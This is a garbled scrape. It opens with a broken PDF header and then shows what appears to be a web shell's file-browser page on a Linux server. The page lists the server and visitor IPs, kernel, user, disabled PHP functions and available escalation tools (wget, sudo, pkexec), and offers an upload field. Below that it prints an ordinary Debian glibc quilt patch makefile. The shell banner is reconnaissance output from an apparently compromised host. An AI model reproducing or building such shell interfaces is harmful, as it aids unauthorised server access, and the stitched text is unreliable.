%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj <
| Server IP : 212.252.79.165 / Your IP : 216.73.216.45 [ Web Server : Apache System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64 User : cehaburo ( 1001) PHP Version : 8.1.33 Disable Function : exec,passthru,shell_exec,system Domains : 48 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/src/glibc/debian/rules.d/ |
Upload File : |
# Implements the patch and unpatch targets, called when building packages. # -*- Makefile -*-, you silly Emacs! # vim: set ft=make: DEBQUILTRC = debian/quiltrc QUILTOPT = --quiltrc $(DEBQUILTRC) QUILT = quilt $(QUILTOPT) patch: $(stamp)patch $(stamp)patch: @if test -r debian/patches/series.$(DEB_HOST_ARCH); then \ pc=".pc.$(DEB_HOST_ARCH)"; \ mkdir -p "$$pc"; \ ln -sf ../debian/patches/series.$(DEB_HOST_ARCH) $$pc/series; \ QUILT_PC="$$pc" $(QUILT) upgrade || true; \ if QUILT_PC="$$pc" $(QUILT) next >/dev/null 2>&1; then \ echo "Applying architecture specific patches... "; \ QUILT_PC="$$pc" $(QUILT) push -a -v ; \ fi ; \ fi touch $@ unpatch: @if test -r debian/patches/series.$(DEB_HOST_ARCH); then \ pc=".pc.$(DEB_HOST_ARCH)"; \ QUILT_PC="$$pc" $(QUILT) upgrade || true; \ if QUILT_PC="$$pc" $(QUILT) applied >/dev/null 2>&1; then \ echo "Unapplying architecture specific patches..."; \ QUILT_PC="$$pc" $(QUILT) pop -a -v ; \ fi ; \ rm -rf $$pc ; \ fi rm -f $(stamp)patch refresh: unpatch @if $(QUILT) applied >/dev/null 2>&1; then \ echo "Unapplying Debian patches..." ; \ $(QUILT) pop -a -v ; \ fi @while $(QUILT) next ; do \ $(QUILT) push ; \ $(QUILT) refresh ; \ done ; \ $(QUILT) pop -a